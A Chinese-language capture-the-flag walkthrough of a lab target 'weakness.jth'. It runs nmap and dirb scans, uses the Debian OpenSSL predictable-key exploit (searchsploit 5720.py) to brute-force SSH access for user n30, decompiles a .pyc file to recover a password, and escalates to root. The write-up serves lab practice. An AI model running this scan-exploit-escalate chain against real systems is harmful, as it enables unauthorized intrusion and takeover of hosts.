1. 主机发现+端口扫描+目录扫描+敏感信息获取
1.1. 主机发现
nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:AC:8D:F6'
1.2. 端口扫描
nmap 192.168.7.135 -p- -A
1.3. 目录扫描
dirb http://192.168.7.135
1.4. 敏感信息收集
whatweb http://192.168.7.135
2. WEB打点寻找漏洞点
2.1. 进入80页面
1.在端口扫描时发现一个域名,可能需要绑定域名
2.修改hosts文件,绑定域名weakness.jth
windows绑定过程详细请移步;
看文章的2.2到下面这步就哦了,其中ip改为靶机ip;域名改成weakness.jth
《wpscan》免费密钥API申请_wpscan api-CSDN博客
Linux绑定过程详细请移步;【后续打靶需要】
看文章的2.2的第5小点;
DERPNSTINK: 1-打靶渗透【附代码】(权限提升)-CSDN博客
3.访问域名,但是没啥有用的信息,网页源码也是
http://weakness.jth
2.2. 拼接扫描的目录
域名拼接不行,只能用IP,可能靶机限制了只能用IP访问的权限
2.2.1. /upload.php
是一个文件上传页面,title与我们主页的那只兔子尾巴一样,有什么渊源吗?
2.2.2. kali绑定该域名,目录扫描
1.绑定域名
2.扫描目录
dirb http://weakness.jth
3.拼接/private
,将两个文件逐个拼接逐个打开查看
4./files/mykey.pub 是一个疑似连接ssh的密钥文件
http://weakness.jth/private/files/mykey.pub
5./files/mykey.pub,提示密钥的生成方式
http://weakness.jth/private/files/mykey.pub
6.在kali上搜索相关漏洞
searchsploit openssl 0.9.8c-1
查看.txt文件的漏洞解释,并下载.py文件,
searchsploit -x /linux/remote/5622.txt
searchsploit -m /linux/remote/5720.py
2.3. GetShell
1.复制链接下载文件
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
# 放置于kali 解压
tar -jxvf 5622.tar.bz2
2.尝试在kali上远程下载靶机网站的mykey.pub文件
wget http://weakness.jth/private/files/mykey.pub
3.利用5720.py爆破
python2 5720.py ./rsa/2048 192.168.7.135 n30 22
# n30 是兔子尾巴那里的,当作用户名
# 下载的rsa文件./rsa/2048
4.得到密码
4161de56829de2fe64b9055711f531c1-2537
# 在生成的rsa的2048目录下进行ssh连接
3. 权限提升
1.在当前目录下有一个code文件
2.查看文件类型 -> 文件类型为python 2.7 byte-compiled
file code
3.靶机打开临时服务
#靶机开启临时服务
python -m SimpleHTTPServer 8001
4.kali上下载code,修改文件后缀为.pyc,用uncompyle6反编译
#kali下载
wget http://192.168.7.135:8001/code
mv code code.pyc
pip install uncompyle6
# 此处需要设置一下环境变量,
uncompyle6 code.pyc > code.py
复制到本地的txt中好看些,感觉貌似是一个登录凭证
n30:dMASDNB!!#B!#!#33
5.尝试利用上述密码提权 -》拿到root权限
sudo su